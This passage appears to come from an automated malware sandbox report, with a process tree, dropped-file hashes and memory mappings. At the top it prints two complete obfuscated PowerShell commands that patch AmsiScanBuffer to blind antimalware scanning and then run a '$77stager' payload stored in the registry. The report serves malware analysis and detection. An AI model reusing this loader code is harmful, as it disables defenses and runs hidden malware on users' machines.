@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vIdszNmDenl=$pCxIrdcIpSNVj.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$yfqjYdYzWbJQZU=$EbynVzihRwyXbL.Invoke($Null,@([Object]$vIdszNmDenl,[Object]('Load'+'LibraryA')));$lSteOJlUwkgYsToFp=$EbynVzihRwyXbL.Invoke($Null,@([Object]$vIdszNmDenl,[Object]('Vir'+'tual'+'Pro'+'tect')));$aBuLXdE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yfqjYdYzWbJQZU,$NgYUkqLqugDZbVfgvAN).Invoke('a'+'m'+'si.dll');$VxwSEsvZolIUcFBKO=$EbynVzihRwyXbL.Invoke($Null,@([Object]$aBuLXdE,[Object]('Ams'+'iSc'+'an'+'Buffer')));$aNhGaUiPDM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lSteOJlUwkgYsToFp,$PydNWbUxeFBCUYMPeETwJY).Invoke($VxwSEsvZolIUcFBKO,[uint32]8,4,[ref]$aNhGaUiPDM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$VxwSEsvZolIUcFBKO,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lSteOJlUwkgYsToFp,$PydNWbUxeFBCUYMPeETwJY).Invoke($VxwSEsvZolIUcFBKO,[uint32]8,0x20,[ref]$aNhGaUiPDM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UxfZNBrcoICu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QSUCkSVPstLQOF,[Parameter(Position=1)][Type]$NsoBUoumHV)$qUoRyEFFFCm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qUoRyEFFFCm.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$QSUCkSVPstLQOF).SetImplementationFlags('Runtime,Managed');$qUoRyEFFFCm.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NsoBUoumHV,$QSUCkSVPstLQOF).SetImplementationFlags('Runtime,Managed');Write-Output $qUoRyEFFFCm.CreateType();}$lPdkyPHmPAHte=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$RZLpJfPAvQXRCr=$lPdkyPHmPAHte.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RpYOpRsTlAsRgoTsodi=UxfZNBrcoICu @([String])([IntPtr]);$ytattScDYPhziNiUMMFAJU=UxfZNBrcoICu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wPYFSqGdRZe=$lPdkyPHmPAHte.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$SFbFsoNKQSlEbA=$RZLpJfPAvQXRCr.Invoke($Null,@([Object]$wPYFSqGdRZe,[Object]('Load'+'LibraryA')));$RvUPMmpmnQCilFzvx=$RZLpJfPAvQXRCr.Invoke($Null,@([Object]$wPYFSqGdRZe,[Object]('Vir'+'tual'+'Pro'+'tect')));$JSugJVA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SFbFsoNKQSlEbA,$RpYOpRsTlAsRgoTsodi).Invoke('a'+'m'+'si.dll');$qmNgCwyhGBNJyDIBp=$RZLpJfPAvQXRCr.Invoke($Null,@([Object]$JSugJVA,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XyTRNusdUJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RvUPMmpmnQCilFzvx,$ytattScDYPhziNiUMMFAJU).Invoke($qmNgCwyhGBNJyDIBp,[uint32]8,4,[ref]$XyTRNusdUJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qmNgCwyhGBNJyDIBp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RvUPMmpmnQCilFzvx,$ytattScDYPhziNiUMMFAJU).Invoke($qmNgCwyhGBNJyDIBp,[uint32]8,0x20,[ref]$XyTRNusdUJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0ffe0d9c-9c50-436f-828e-941eabf34f07}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoFilesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Temp\4650.exeFilesize
2.6MB
MD5d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8
SHA1ed7413773b7c9154c9aeed9d173f61577522e0db
SHA256576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983
SHA512858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5
-
C:\Users\Admin\AppData\Local\Temp\4650.exeFilesize
2.6MB
MD5d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8
SHA1ed7413773b7c9154c9aeed9d173f61577522e0db
SHA256576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983
SHA512858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5
-
C:\Users\Admin\AppData\Local\Temp\4910.exeFilesize
280KB
MD5d6efea57ee880adc4d4fdc6dc5e4d304
SHA13f5c3dfd25dddd7afea7df8b41678d1d49689dc9
SHA25664d71e922f1d186453fd46ec5353e3fb2c773609c72eaf4307e2a0ccec937d54
SHA512695c566685c465559ed39bfe8de200a9ef30cde2682875b84a5b6d61d3faea84038035e53c853b91269d0c53d76fbf3f96284c2f375f7daf97244721acaa66c7
-
C:\Users\Admin\AppData\Local\Temp\4910.exeFilesize
280KB
MD5d6efea57ee880adc4d4fdc6dc5e4d304
SHA13f5c3dfd25dddd7afea7df8b41678d1d49689dc9
SHA25664d71e922f1d186453fd46ec5353e3fb2c773609c72eaf4307e2a0ccec937d54
SHA512695c566685c465559ed39bfe8de200a9ef30cde2682875b84a5b6d61d3faea84038035e53c853b91269d0c53d76fbf3f96284c2f375f7daf97244721acaa66c7
-
C:\Users\Admin\AppData\Local\Temp\4B34.exeFilesize
395KB
MD5a864c7dcd49506486eb4a15632a34c03
SHA16f247530bd632cb53cdc0b7a8c466e2144c16d84
SHA256dc69e3a17aba90423107dc5915e8a32e76d92aca74323131b36cf9fb144ecdbf
SHA51271ea6c60927c29d24a5cb992490e0b71b2c5355b01b4de739a44b4fed2b2315eb6b5081ee44c65b71b08f9c5e0d6591b9b6b7e136cb31a47581420bbe92b7a72
-
C:\Users\Admin\AppData\Local\Temp\4B34.exeFilesize
395KB
MD5a864c7dcd49506486eb4a15632a34c03
SHA16f247530bd632cb53cdc0b7a8c466e2144c16d84
SHA256dc69e3a17aba90423107dc5915e8a32e76d92aca74323131b36cf9fb144ecdbf
SHA51271ea6c60927c29d24a5cb992490e0b71b2c5355b01b4de739a44b4fed2b2315eb6b5081ee44c65b71b08f9c5e0d6591b9b6b7e136cb31a47581420bbe92b7a72
-
C:\Users\Admin\AppData\Local\Temp\50F2.exeFilesize
381KB
MD5f822288a43681e1a0d1fc6eca74c929c
SHA157d7b1830e03f4e9f3ad66ce1ae232789fa14fde
SHA2566e3e2d9edb72aff201a38d229b2c3bab530e7486c0902021a2626ba6201941c1
SHA512636b6e9781468a0fd2447534de56697cab8ba054d3c943511fd2efeccc6966f0f6f0c0b4c01ed3ce82657bcb4cf1ede182f61385268b08c837cc766e5128e2aa
-
C:\Users\Admin\AppData\Local\Temp\50F2.exeFilesize
381KB
MD5f822288a43681e1a0d1fc6eca74c929c
SHA157d7b1830e03f4e9f3ad66ce1ae232789fa14fde
SHA2566e3e2d9edb72aff201a38d229b2c3bab530e7486c0902021a2626ba6201941c1
SHA512636b6e9781468a0fd2447534de56697cab8ba054d3c943511fd2efeccc6966f0f6f0c0b4c01ed3ce82657bcb4cf1ede182f61385268b08c837cc766e5128e2aa
-
C:\Users\Admin\AppData\Local\Temp\5373.exeFilesize
1.1MB
MD5ff97413fadad115998666fd129ccb86d
SHA1152ca9dd31bf0c84f435154727186c8dca441f00
SHA2566238542631b73f4d10cba3147b1e3326b01bc1f0ebf1cee83423eb2a4c9a6213
SHA5122fdc2a83645d5764e81612903f6fd10581ba446bf52762f0cadc2b5e51b529dd522548c9545b4825b1924af4dc2556dfb1b3be0f6f94ffe7ef072511ef2f5c40
-
C:\Users\Admin\AppData\Local\Temp\5373.exeFilesize
1.1MB
MD5ff97413fadad115998666fd129ccb86d
SHA1152ca9dd31bf0c84f435154727186c8dca441f00
SHA2566238542631b73f4d10cba3147b1e3326b01bc1f0ebf1cee83423eb2a4c9a6213
SHA5122fdc2a83645d5764e81612903f6fd10581ba446bf52762f0cadc2b5e51b529dd522548c9545b4825b1924af4dc2556dfb1b3be0f6f94ffe7ef072511ef2f5c40
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
3.2MB
MD5d4bfc3207e75c9abec7f189615ea74b3
SHA13210f5a8f4d4a81a8f928fc1a5510cd7703c5fc6
SHA2561ebbaa7747ec547b511fa90255cc4cb1c6993bbe9a112a650cfbd2c532cf2cfa
SHA51202371b8da448c7de945174cd8a2b609046b2627270682a8e7384e42d9c7b9909d0f5f9c50d170965f92843ce649505b0ce4c833ba4158585b3cea219f5e5ca65
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
3.2MB
MD5d4bfc3207e75c9abec7f189615ea74b3
SHA13210f5a8f4d4a81a8f928fc1a5510cd7703c5fc6
SHA2561ebbaa7747ec547b511fa90255cc4cb1c6993bbe9a112a650cfbd2c532cf2cfa
SHA51202371b8da448c7de945174cd8a2b609046b2627270682a8e7384e42d9c7b9909d0f5f9c50d170965f92843ce649505b0ce4c833ba4158585b3cea219f5e5ca65
-
C:\Users\Admin\AppData\Local\Temp\syst.exeFilesize
117KB
MD56dd56c2df2d4de01cf93d923d4136ba7
SHA1825d4f52bb1347019407a5192301fd9c0612f55d
SHA256f57ace5c3adf5447bb4a8e4905a8c4001ada92954689743adb25931ab42fecf8
SHA512a8dd5d3f693dd6ece444084043b9e8c5b2dfbf3f77589649fbb8e017f7f42736a84ccaa7218d87ffd02e7a9d66425a005ab4beb360a727fb06cba0eef7cb96c7
-
C:\Users\Admin\AppData\Local\Temp\syst.exeFilesize
117KB
MD56dd56c2df2d4de01cf93d923d4136ba7
SHA1825d4f52bb1347019407a5192301fd9c0612f55d
SHA256f57ace5c3adf5447bb4a8e4905a8c4001ada92954689743adb25931ab42fecf8
SHA512a8dd5d3f693dd6ece444084043b9e8c5b2dfbf3f77589649fbb8e017f7f42736a84ccaa7218d87ffd02e7a9d66425a005ab4beb360a727fb06cba0eef7cb96c7
-
C:\Users\Admin\AppData\Local\Temp\zqglpzon.exeFilesize
10.8MB
MD5134b98c2b2e11ee00b0a51a20c4e2833
SHA1c2c63ec5dfd9f1eedfbacc644f0aee1deba85cbf
SHA256c7c1a686d4322b9375ad3775a43dce73f71ee84922099fa1c49e722227930e69
SHA512f86e90e4d13aa872bed7be22b3af20072d324c3ab42d7cb1c2d77c71284d7ab1050258651fedef236e5b7bb59c020650241a0d97d5851069eecf1d3ec895da67
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnkFilesize
2KB
MD5363e2e7483affb2bb4fa794d485dbb6d
SHA16d3658d714eab80abfe34222d4410d4e86f6e9f4
SHA2560f03a5f795d3488b6185304592e5bf289bb11c3083b4889a17e35878571b5482
SHA5123558d1e3e72467108e84f9217842466d96c4a70d1c11aeda67a233f4c125f83f0be156ed7cd32d63eac05c924fe5c5864a863df9196cd741493db8a22c17bb4f
-
C:\Users\Admin\AppData\Roaming\dsgjfrcFilesize
280KB
MD51d512d993cd27ebccc0857bcf56d71a8
SHA18aa50624fbc619c694aa533ef69533d8d92801e5
SHA256c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f
SHA51233a0eca1c0b61e5512add899219ef1aac2e06db633969a411a3b39acadea886e9f28f643a888b1c7cfe393c47c51782fb67a5ac2613d38f2d22c94d83d4e1e4c
-
C:\Users\Admin\AppData\Roaming\dsgjfrcFilesize
280KB
MD51d512d993cd27ebccc0857bcf56d71a8
SHA18aa50624fbc619c694aa533ef69533d8d92801e5
SHA256c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f
SHA51233a0eca1c0b61e5512add899219ef1aac2e06db633969a411a3b39acadea886e9f28f643a888b1c7cfe393c47c51782fb67a5ac2613d38f2d22c94d83d4e1e4c
-
C:\Users\Admin\Desktop\Microsoft Edge.lnkFilesize
2KB
MD589d4dc42a1dd8f11403816c153710f85
SHA13a4de0f99a6c59d12bd24d976de181222f04f3bf
SHA25642f96e11583f0ee44d837cdc0fa36b946157b43898f4af6de6158ecdb7159d83
SHA512abbaf81287317189f9b30343d6004101d75761c666ce05ee1dcd581cce9543a78a2bfa03edca0ecccc2eafa362c1a7db0c4fce5b3a51ef6abcf7f9caeb48da9a
-
C:\Windows\SysWOW64\$77Host.xmlFilesize
2KB
MD528d5a5d34b52beb9079783216a2a18ea
SHA167635e4a50cae5bddae6791034da43b67d1c9675
SHA25683ec6af368a5fe3d399f9e35b8bcc119424e35d6d4379b904a64304491d84d01
SHA512ded649184cf3f2cb07a22fcf78cc1f90221293c548d0ca2438c44c38553c59bfc8c24258dcf4ca1242bf6f3176e76fb7a7a799db7cbda88df39d9df25c3b2abb
-
C:\Windows\SysWOW64\$77Install.exeFilesize
2.3MB
MD581b999918d94285ca5791aed3c8157fe
SHA12578c47353c13cf28468518c79ee5a035beed760
SHA2565917eaf394a1ef0e1dc0cdb4a00260efbf51d1ea20d48ab68f7325cfe4b3ad04
SHA512e7b92ccfe60142ea4e2605397104e5f0628c78431ff56a69a4868645b05444ece53679db26a724856f8c4c65d39017c51a467a27714b95f5aceee211ac70734e
-
C:\Windows\SysWOW64\bxghhwvz\zqglpzon.exeFilesize
10.8MB
MD5134b98c2b2e11ee00b0a51a20c4e2833
SHA1c2c63ec5dfd9f1eedfbacc644f0aee1deba85cbf
SHA256c7c1a686d4322b9375ad3775a43dce73f71ee84922099fa1c49e722227930e69
SHA512f86e90e4d13aa872bed7be22b3af20072d324c3ab42d7cb1c2d77c71284d7ab1050258651fedef236e5b7bb59c020650241a0d97d5851069eecf1d3ec895da67
-
\??\pipe\LOCAL\crashpad_3604_OXYUSJFFAKBZVFZIMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/212-275-0x0000000000000000-mapping.dmp
-
memory/424-332-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/428-331-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/604-325-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/660-326-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/936-330-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1016-327-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1028-333-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1048-334-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1120-335-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1196-336-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1216-340-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1264-343-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1352-344-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1400-345-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1428-346-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1448-347-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1504-348-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1592-349-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1632-350-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1640-366-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1660-365-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1808-368-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1816-367-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1864-251-0x0000000000E00000-0x0000000000E15000-memory.dmpFilesize
84KB
-
memory/1864-250-0x0000000000000000-mapping.dmp
-
memory/1864-269-0x0000000000E00000-0x0000000000E15000-memory.dmpFilesize
84KB
-
memory/1900-369-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/1908-370-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmpFilesize
64KB
-
memory/2220-158-0x0000000000000000-mapping.dmp
-
memory/2372-265-0x00007FF639A70000-0x00007FF63A32B000-memory.dmpFilesize
8.7MB
-
memory/2372-258-0x0000000000000000-mapping.dmp
-
memory/2372-267-0x00007FF639A70000-0x00007FF63A32B000-memory.dmpFilesize
8.7MB
-
memory/2860-230-0x0000000000000000-mapping.dmp
-
memory/2876-268-0x0000000000000000-mapping.dmp
-
memory/2948-150-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-144-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-142-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-138-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-140-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-143-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-151-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-152-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-139-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-141-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-153-0x0000000002A40000-0x0000000002A50000-memory.dmpFilesize
64KB
-
memory/2948-156-0x0000000002A60000-0x0000000002A70000-memory.dmpFilesize
64KB
-
memory/2948-145-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-154-0x0000000002A60000-0x0000000002A70000-memory.dmpFilesize
64KB
-
memory/2948-149-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-155-0x0000000002A60000-0x0000000002A70000-memory.dmpFilesize
64KB
-
memory/2948-148-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-147-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-136-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-146-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/2948-157-0x0000000002A60000-0x0000000002A70000-memory.dmpFilesize
64KB
-
memory/2948-137-0x0000000002A30000-0x0000000002A40000-memory.dmpFilesize
64KB
-
memory/3220-277-0x0000000000000000-mapping.dmp
-
memory/3604-257-0x00000268BEBA0000-0x00000268BEBAF000-memory.dmpFilesize
60KB
-
memory/3604-247-0x0000000000000000-mapping.dmp
-
memory/3668-262-0x0000000000000000-mapping.dmp
-
memory/3676-232-0x0000000000000000-mapping.dmp
-
memory/3964-263-0x0000000000000000-mapping.dmp
-
memory/4428-270-0x0000013991BA0000-0x0000013991BAF000-memory.dmpFilesize
60KB
-
memory/4428-248-0x0000000000000000-mapping.dmp
-
memory/4604-253-0x000000000058A000-0x000000000059A000-memory.dmpFilesize
64KB
-
memory/4604-256-0x0000000000400000-0x000000000044B000-memory.dmpFilesize
300KB
-
memory/4788-242-0x0000000000000000-mapping.dmp
-
memory/4828-134-0x0000000000400000-0x000000000044B000-memory.dmpFilesize
300KB
-
memory/4828-132-0x000000000061E000-0x000000000062F000-memory.dmpFilesize
68KB
-
memory/4828-135-0x0000000000400000-0x000000000044B000-memory.dmpFilesize
300KB
-
memory/4828-133-0x00000000005E0000-0x00000000005E9000-memory.dmpFilesize
36KB
-
memory/5188-282-0x0000000000000000-mapping.dmp
-
memory/5292-286-0x0000000000000000-mapping.dmp
-
memory/5512-288-0x0000000000000000-mapping.dmp
-
memory/5528-290-0x0000000000000000-mapping.dmp
-
memory/5784-292-0x0000000000000000-mapping.dmp
-
memory/5860-296-0x0000000000000000-mapping.dmp
-
memory/5876-298-0x0000000000000000-mapping.dmp
-
memory/6020-302-0x0000000000000000-mapping.dmp
-
memory/6040-303-0x0000000000000000-mapping.dmp
-
memory/6064-305-0x0000000000000000-mapping.dmp
-
memory/6172-313-0x00007FFFFD270000-0x00007FFFFD32E000-memory.dmpFilesize
760KB
-
memory/6172-312-0x00007FFFFD8B0000-0x00007FFFFDAA5000-memory.dmpFilesize
2.0MB
-
memory/6420-317-0x0000000140000000-0x000000014033D000-memory.dmpFilesize
3.2MB
-
memory/6420-318-0x0000000140000000-0x000000014033D000-memory.dmpFilesize
3.2MB
-
memory/6420-320-0x00007FFFFD270000-0x00007FFFFD32E000-memory.dmpFilesize
760KB
-
memory/6420-319-0x00007FFFFD8B0000-0x00007FFFFDAA5000-memory.dmpFilesize
2.0MB
-
memory/6420-316-0x0000000140075238-mapping.dmp
-
memory/6420-315-0x0000000140000000-0x000000014033D000-memory.dmpFilesize
3.2MB
-
memory/6776-341-0x0000000000000000-mapping.dmp
-
memory/6832-233-0x000000000075F000-0x0000000000770000-memory.dmpFilesize
68KB
-
memory/6832-234-0x0000000000400000-0x000000000044B000-memory.dmpFilesize
300KB
-
memory/6832-161-0x0000000000000000-mapping.dmp
-
memory/6832-216-0x0000000000400000-0x000000000044B000-memory.dmpFilesize
300KB
-
memory/6832-214-0x000000000075F000-0x0000000000770000-memory.dmpFilesize
68KB
-
memory/6832-215-0x0000000000590000-0x00000000005A3000-memory.dmpFilesize
76KB
-
memory/6916-353-0x0000000000000000-mapping.dmp
-
memory/17552-164-0x0000000000000000-mapping.dmp
-
memory/53496-222-0x000000000E640000-0x000000000EBE4000-memory.dmpFilesize
5.6MB
-
memory/53496-181-0x000000000B7E0000-0x000000000B7F2000-memory.dmpFilesize
72KB
-
memory/53496-219-0x000000000B520000-0x000000000B5B2000-memory.dmpFilesize
584KB
-
memory/53496-238-0x000000000F120000-0x000000000F64C000-memory.dmpFilesize
5.2MB
-
memory/53496-241-0x0000000007A40000-0x0000000007A90000-memory.dmpFilesize
320KB
-
memory/53496-237-0x000000000E260000-0x000000000E422000-memory.dmpFilesize
1.8MB
-
memory/53496-183-0x000000000D1E0000-0x000000000D21C000-memory.dmpFilesize
240KB
-
memory/53496-218-0x000000000B400000-0x000000000B476000-memory.dmpFilesize
472KB
-
memory/53496-180-0x000000000D2B0000-0x000000000D3BA000-memory.dmpFilesize
1.0MB
-
memory/53496-179-0x000000000B830000-0x000000000BE48000-memory.dmpFilesize
6.1MB
-
memory/53496-167-0x0000000000000000-mapping.dmp
-
memory/53496-171-0x0000000000CC0000-0x0000000000D28000-memory.dmpFilesize
416KB
-
memory/60952-170-0x0000000000000000-mapping.dmp
-
memory/60952-175-0x0000000000F20000-0x0000000001044000-memory.dmpFilesize
1.1MB
-
memory/60952-199-0x00000000059E0000-0x0000000005A02000-memory.dmpFilesize
136KB
-
memory/63496-177-0x0000000000BB0000-0x0000000000BBB000-memory.dmpFilesize
44KB
-
memory/63496-235-0x0000000000BC0000-0x0000000000BC7000-memory.dmpFilesize
28KB
-
memory/63496-174-0x0000000000000000-mapping.dmp
-
memory/63496-176-0x0000000000BC0000-0x0000000000BC7000-memory.dmpFilesize
28KB
-
memory/75988-178-0x0000000000000000-mapping.dmp
-
memory/75988-184-0x0000000000CE0000-0x0000000000CEF000-memory.dmpFilesize
60KB
-
memory/75988-182-0x0000000000CF0000-0x0000000000CF9000-memory.dmpFilesize
36KB
-
memory/75988-236-0x0000000000CF0000-0x0000000000CF9000-memory.dmpFilesize
36KB
-
memory/85732-239-0x00000000008F0000-0x00000000008F5000-memory.dmpFilesize
20KB
-
memory/85732-185-0x0000000000000000-mapping.dmp
-
memory/85732-188-0x00000000008E0000-0x00000000008E9000-memory.dmpFilesize
36KB
-
memory/85732-186-0x00000000008F0000-0x00000000008F5000-memory.dmpFilesize
20KB
-
memory/95676-189-0x0000000000000000-mapping.dmp
-
memory/95676-190-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/95684-240-0x00000000009C0000-0x00000000009C6000-memory.dmpFilesize
24KB
-
memory/95684-197-0x00000000009B0000-0x00000000009BC000-memory.dmpFilesize
48KB
-
memory/95684-187-0x0000000000000000-mapping.dmp
-
memory/95684-196-0x00000000009C0000-0x00000000009C6000-memory.dmpFilesize
24KB
-
memory/95704-226-0x0000000000000000-mapping.dmp
-
memory/95732-227-0x0000000000000000-mapping.dmp
-
memory/95756-195-0x0000000000000000-mapping.dmp
-
memory/95756-198-0x0000000000400000-0x0000000000427000-memory.dmpFilesize
156KB
-
memory/95800-201-0x0000000001380000-0x0000000001389000-memory.dmpFilesize
36KB
-
memory/95800-245-0x0000000001390000-0x0000000001395000-memory.dmpFilesize
20KB
-
memory/95800-200-0x0000000000000000-mapping.dmp
-
memory/95860-202-0x0000000000000000-mapping.dmp
-
memory/95860-204-0x0000000004E00000-0x0000000005428000-memory.dmpFilesize
6.2MB
-
memory/95860-203-0x0000000002660000-0x0000000002696000-memory.dmpFilesize
216KB
-
memory/95860-228-0x0000000007490000-0x0000000007B0A000-memory.dmpFilesize
6.5MB
-
memory/95860-206-0x0000000004CE0000-0x0000000004D46000-memory.dmpFilesize
408KB
-
memory/95860-207-0x00000000055E0000-0x0000000005646000-memory.dmpFilesize
408KB
-
memory/95860-210-0x0000000005C10000-0x0000000005C2E000-memory.dmpFilesize
120KB
-
memory/95860-229-0x00000000060B0000-0x00000000060CA000-memory.dmpFilesize
104KB
-
memory/95932-205-0x0000000000000000-mapping.dmp
-
memory/95932-208-0x0000000000A70000-0x0000000000A76000-memory.dmpFilesize
24KB
-
memory/95932-246-0x0000000000A70000-0x0000000000A76000-memory.dmpFilesize
24KB
-
memory/95932-209-0x0000000000A60000-0x0000000000A6B000-memory.dmpFilesize
44KB
-
memory/96012-211-0x0000000000000000-mapping.dmp
-
memory/96012-213-0x00000000006B0000-0x00000000006BD000-memory.dmpFilesize
52KB
-
memory/96012-212-0x00000000006C0000-0x00000000006C7000-memory.dmpFilesize
28KB
-
memory/96012-249-0x00000000006C0000-0x00000000006C7000-memory.dmpFilesize
28KB
-
memory/96092-217-0x0000000000000000-mapping.dmp
-
memory/96156-220-0x0000000000000000-mapping.dmp
-
memory/96156-223-0x0000000000890000-0x0000000000898000-memory.dmpFilesize
32KB
-
memory/96156-224-0x0000000000880000-0x000000000088B000-memory.dmpFilesize
44KB
-
memory/96156-255-0x0000000000890000-0x0000000000898000-memory.dmpFilesize
32KB
-
memory/96176-221-0x0000000000000000-mapping.dmp